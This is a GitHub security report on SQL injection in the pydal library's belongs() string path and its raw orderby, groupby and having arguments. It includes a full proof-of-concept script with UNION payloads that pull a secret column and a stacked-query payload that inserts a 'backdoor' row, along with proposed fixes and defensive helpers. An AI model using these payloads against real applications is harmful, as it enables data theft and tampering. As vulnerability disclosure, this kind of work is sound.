SQL Injection via Field.belongs(str) and raw-string select() parameters #766

@AAtomical

Description

Hello @cj @kirsn @jek @mfyuce @houdinihound, I'd like to report a vulnerability, but I can't find the "Report a vulnerability" tab on the Security page, so the full bug report is below.

Summary

pydal's Field.belongs() method silently accepts a plain Python str argument and interpolates it verbatim into the IN (...) clause of the generated SQL, applying only a single-character tail-strip (second[:-1]) as a trivially bypassed mitigation. Any application that passes user-controlled data as a string to belongs() — a very natural pattern for filter APIs — is vulnerable to SQL injection.

Additionally, the select(), _select(), and equivalent ORM methods accept orderby, groupby, and having as raw Python strings, which are expanded into SQL with no validation or escaping. Passing request.params['sort'] directly to select(orderby=...) is the canonical developer mistake.

Both sinks are analogous to CVE-2026-26198 (ormar): an ORM operation that appears parametric but silently falls back to raw SQL interpolation for string arguments.


Vulnerable code

Sink 1: Field.belongs(str) (pydal/dialects/base.py:289-290)

def belongs(self, first, second, query_env={}):
    ftype = first.type
    first = self.expand(first, query_env=query_env)
    if isinstance(second, str):
        return "(%s IN (%s))" % (first, second[:-1])   # ← second[:-1]: strips one char only
    elif isinstance(second, Select):
        ...

The second[:-1] strip is a weak attempt to remove a trailing ; but it does nothing to prevent:

  • Subquery injection (UNION SELECT ...)
  • Stacked queries on databases that support them
  • -- comment injection (the strip turns a trailing -- into a single -, but appending any throwaway character after -- leaves the comment marker intact)
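
The effect of the one-character strip can be reproduced without pydal. The sketch below is a simplified stand-in for the string branch quoted above; render_in_clause is a hypothetical helper name, not a pydal function, and the column SQL is passed in already expanded.

```python
def render_in_clause(column_sql: str, second: str) -> str:
    """Mimic the string branch: drop the last character, interpolate the rest."""
    return "(%s IN (%s))" % (column_sql, second[:-1])


# A payload padded with one throwaway character survives the strip intact.
payload = "SELECT id FROM users WHERE 1=2 UNION SELECT id FROM users" + "X"
rendered = render_in_clause('"users"."id"', payload)
print(rendered)

# A payload ending in a comment marker only needs the same padding.
commented = render_in_clause('"users"."id"', "1) OR 1=1 --" + "X")
print(commented)
```

In both cases the padding character is the only thing removed, so the strip does not constrain what reaches the IN (...) clause.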

Entry point: Field.belongs() (pydal/objects.py:1782-1793)

def belongs(self, *value, **kwattr):
    """
    Accepts the following inputs::
       field.belongs(1, 2)
       field.belongs((1, 2))
       field.belongs(query)
    Does NOT accept:
           field.belongs(1)
    """
    db = self.db
    if len(value) == 1:
        value = value[0]
    if isinstance(value, Query):
        value = db(value)._select(value.first._table._id)
    elif not isinstance(value, (Select, basestring)):   # ← if value IS a str → falls through
        value = list(sorted(value))
        ...
    return Query(self.db, self._dialect.belongs, self, value)  # ← str passed raw to dialect

Sink 2: select(orderby/groupby/having=str) (pydal/adapters/base.py:808-814)

# orderby
if orderby:
    if isinstance(orderby, (list, tuple)):
        orderby = xorify(orderby)
    if str(orderby) == "<random>":
        ...
    else:
        sql_ord = self.expand(orderby, query_env=query_env)  # ← raw str falls through

Call chain: self.expand(str_value) → _expand(str_value) → final else branch (rv = expression; return str(rv)). The string is returned as-is and inserted directly into the SQL ORDER BY / GROUP BY / HAVING clause.

The same _expand path handles groupby and having.


Exploit trace

Attack 1: belongs(str) subquery injection

Attacker goal: extract all rows (including secret column) from a users table.

Typical vulnerable application code:

# Developer expects a comma-separated list of IDs from the client
user_ids = request.json.get('filter_ids')          # attacker-controlled
rows = db(db.users.id.belongs(user_ids)).select()  # ← user_ids is a str → raw SQL

Payload (any trailing character to absorb the [:-1] strip):

SELECT id FROM users WHERE 1=2 UNION SELECT id FROM users LIMIT 100X

Generated SQL:

SELECT "users"."id", "users"."name", "users"."age", "users"."secret"
FROM "users"
WHERE ("users"."id" IN (
    SELECT id FROM users WHERE 1=2 UNION SELECT id FROM users LIMIT 100
))
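
Until the library rejects strings, an application can keep the raw-SQL branch out of reach by converting client input to a list of integers before calling belongs(). This is a minimal sketch under the assumption that the IDs are integers; parse_id_list is a hypothetical helper, not part of pydal.

```python
import re
from typing import List

_INT_RE = re.compile(r"-?[0-9]+")


def parse_id_list(raw) -> List[int]:
    """Convert client input into a list of ints; raise ValueError for anything else."""
    if isinstance(raw, str):
        # "1, 2,3" -> ["1", "2", "3"]; empty segments are dropped
        parts = [p.strip() for p in raw.split(",") if p.strip()]
    elif isinstance(raw, (list, tuple)):
        parts = list(raw)
    else:
        raise ValueError(f"unsupported id list: {raw!r}")

    ids = []
    for part in parts:
        if isinstance(part, int) and not isinstance(part, bool):
            ids.append(part)
        elif isinstance(part, str) and _INT_RE.fullmatch(part.strip()):
            ids.append(int(part.strip()))
        else:
            raise ValueError(f"not an integer id: {part!r}")
    return ids


# Intended use with the vulnerable snippet above (not executed here):
# rows = db(db.users.id.belongs(parse_id_list(user_ids))).select()
```

Because the result is always a list, belongs() takes the list path rather than the string path, and the UNION payload above is rejected with a ValueError before any SQL is built.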

Attack 2: orderby=str ORDER BY injection

Typical vulnerable application code:

sort_col = request.params.get('sort', 'id')        # attacker-controlled
rows = db(db.users).select(orderby=sort_col)       # ← raw string in ORDER BY

Payload:

id; INSERT INTO users(name,secret) VALUES('backdoor','pwned')--X

Generated SQL (the second statement runs only on drivers that allow stacked queries):

SELECT "users"."id", "users"."name", "users"."age", "users"."secret"
FROM "users"
WHERE ("users"."id" IS NOT NULL)
ORDER BY id; INSERT INTO users(name,secret) VALUES('backdoor','pwned')--X;
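
On the application side, one way to keep attacker-controlled text out of orderby is to treat the request parameter as a key into a fixed allow-list of pre-built orderings. A minimal sketch follows; resolve_sort and the example keys are hypothetical. With pydal the mapping values would be Field expressions such as db.users.id or ~db.users.age; plain strings stand in for them here so the block runs without a database.

```python
from typing import Mapping, TypeVar

T = TypeVar("T")


def resolve_sort(sort_param, allowed: Mapping[str, T], default: str) -> T:
    """Return the pre-built ordering for an allow-listed key, else the default one."""
    if isinstance(sort_param, str) and sort_param in allowed:
        return allowed[sort_param]
    return allowed[default]


# Stand-in values; in an application these would be Field objects.
allowed_sorts = {"id": "ORDER_BY_ID", "name": "ORDER_BY_NAME"}
print(resolve_sort("name", allowed_sorts, "id"))
print(resolve_sort("id; INSERT INTO users ...", allowed_sorts, "id"))

# Intended use with the vulnerable snippet above (not executed here):
# allowed = {"id": db.users.id, "name": db.users.name, "-age": ~db.users.age}
# rows = db(db.users).select(orderby=resolve_sort(sort_col, allowed, "id"))
```

The request value only selects among expressions the developer wrote, so it never becomes part of the SQL text.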

End-to-end PoC

#!/usr/bin/env python3
import sys
sys.path.insert(0, '/tmp/pydal_clone')

from pydal import DAL, Field

# ── Setup ──────────────────────────────────────────────────────────────────
db = DAL('sqlite:memory')
db.define_table('users', Field('name'), Field('age', 'integer'), Field('secret'))
db.users.insert(name='alice',  age=30, secret='alice_secret')
db.users.insert(name='bob',    age=25, secret='bob_secret')
db.users.insert(name='admin',  age=99, secret='SUPERSECRET_PASSWORD')
db.commit()

print("=== pydal SQL injection PoC ===\n")
print("[*] Table has 3 rows. Attacker targets 'admin' secret via belongs(str) injection.\n")

# ── Attack 1: belongs(str) — UNION-based data extraction ──────────────────
# Normal API: db(table.id.belongs([1, 2])).select()  → safe, parametrized
# Trap:       db(table.id.belongs("some_string")).select()  → raw SQL

payload_belongs = (
    "SELECT id FROM users WHERE 1=2 "
    "UNION SELECT id FROM users LIMIT 100X"  # trailing X is stripped by second[:-1]
)

q = db.users.id.belongs(payload_belongs)
sql = db(q)._select(db.users.ALL)
print(f"[*] Generated SQL (belongs injection):\n    {sql}\n")

rows = db(q).select(db.users.ALL)
print(f"[+] Rows exfiltrated: {len(rows)}")
for r in rows:
    print(f"    name={r.name:<12}  secret={r.secret}")

print()

# ── Attack 2: orderby=str — ORDER BY injection ────────────────────────────
# Normal usage:  db(table).select(orderby=table.id)         → safe Field object
# Dangerous:     db(table).select(orderby=request_param)    → raw string in SQL

payload_orderby = "name DESC; SELECT secret FROM users--X"
sql2 = db(db.users)._select(db.users.ALL, orderby=payload_orderby)
print(f"[*] Generated SQL (orderby injection):\n    {sql2}\n")

# ── Attack 3: groupby=str ─────────────────────────────────────────────────
payload_groupby = "name) UNION SELECT secret,1,1,1 FROM users--X"
sql3 = db(db.users)._select(db.users.name, groupby=payload_groupby)
print(f"[*] Generated SQL (groupby injection):\n    {sql3}\n")

# ── Attack 4: having=str ──────────────────────────────────────────────────
payload_having = "1=1 UNION SELECT secret FROM users--X"
sql4 = db(db.users)._select(
    db.users.name,
    groupby=db.users.name,
    having=payload_having,
)
print(f"[*] Generated SQL (having injection):\n    {sql4}\n")

print("[+] All four injection vectors confirmed on pydal 20260313.1")

Output: [screenshot of the PoC output]

Fix

Minimal: keep the raw-string path but document it

# pydal/objects.py — Field.belongs()
def belongs(self, *value, **kwattr):
    db = self.db
    if len(value) == 1:
        value = value[0]
    if isinstance(value, Query):
        value = db(value)._select(value.first._table._id)
    elif isinstance(value, (Select, basestring)):
        pass   # raw SQL subquery — intentional, keep as-is but document clearly
    else:
        value = list(sorted(value))
        ...
    return Query(self.db, self._dialect.belongs, self, value)

No change is needed to the objects.py flow, but dialect.belongs should at minimum document the string path as raw SQL:

# pydal/dialects/base.py
def belongs(self, first, second, query_env={}):
    ...
    if isinstance(second, str):
        # WARNING: raw SQL subquery — caller is responsible for sanitization
        # Do NOT pass user-controlled strings here.
        return "(%s IN (%s))" % (first, second[:-1])

Recommended: warn on raw strings

# pydal/dialects/base.py
import warnings


class SecurityWarning(UserWarning):
    """Category for unsafe raw-SQL usage (Python has no built-in SecurityWarning)."""


def belongs(self, first, second, query_env={}):
    ...
    if isinstance(second, str):
        warnings.warn(
            "Field.belongs() received a raw string. "
            "Pass a list/tuple of values or a pydal Query/Select object. "
            "Raw SQL strings bypass parametrization and may cause SQL injection.",
            SecurityWarning,
            stacklevel=4,
        )
        return "(%s IN (%s))" % (first, second[:-1])
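
Deployments that want this warning to fail hard could promote it to an exception with the standard warnings filter. The sketch below assumes a SecurityWarning category defined as a UserWarning subclass; check_belongs_arg is a hypothetical stand-in for the dialect method so the block runs without pydal.

```python
import warnings


class SecurityWarning(UserWarning):
    """Assumed warning category; not a Python built-in."""


def check_belongs_arg(second):
    """Hypothetical stand-in for the string branch: warn when given raw SQL text."""
    if isinstance(second, str):
        warnings.warn("belongs() received a raw string", SecurityWarning, stacklevel=2)
    return second


def call_strict(value):
    """Run the check with SecurityWarning escalated to an exception."""
    with warnings.catch_warnings():
        warnings.simplefilter("error", SecurityWarning)
        return check_belongs_arg(value)


print(call_strict([1, 2]))  # lists pass through untouched
try:
    call_strict("1, 2X")
except SecurityWarning as exc:
    print("rejected:", exc)
```

The filter is scoped by catch_warnings(), so other warnings keep their normal behaviour; a process-wide variant would call warnings.simplefilter once at startup instead.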

For orderby/groupby/having — validate against table fields

# pydal/adapters/base.py — _select()
if orderby and isinstance(orderby, str) and orderby != "<random>":
    # Validate against known field names before inserting into SQL
    valid_fields = {f for table in tablenames.values() for f in table.fields}
    candidate = orderby.lstrip("~")
    if candidate not in valid_fields:
        raise ValueError(
            f"orderby={orderby!r} is not a valid field name. "
            "Pass a Field object or a field name string matching a defined field."
        )
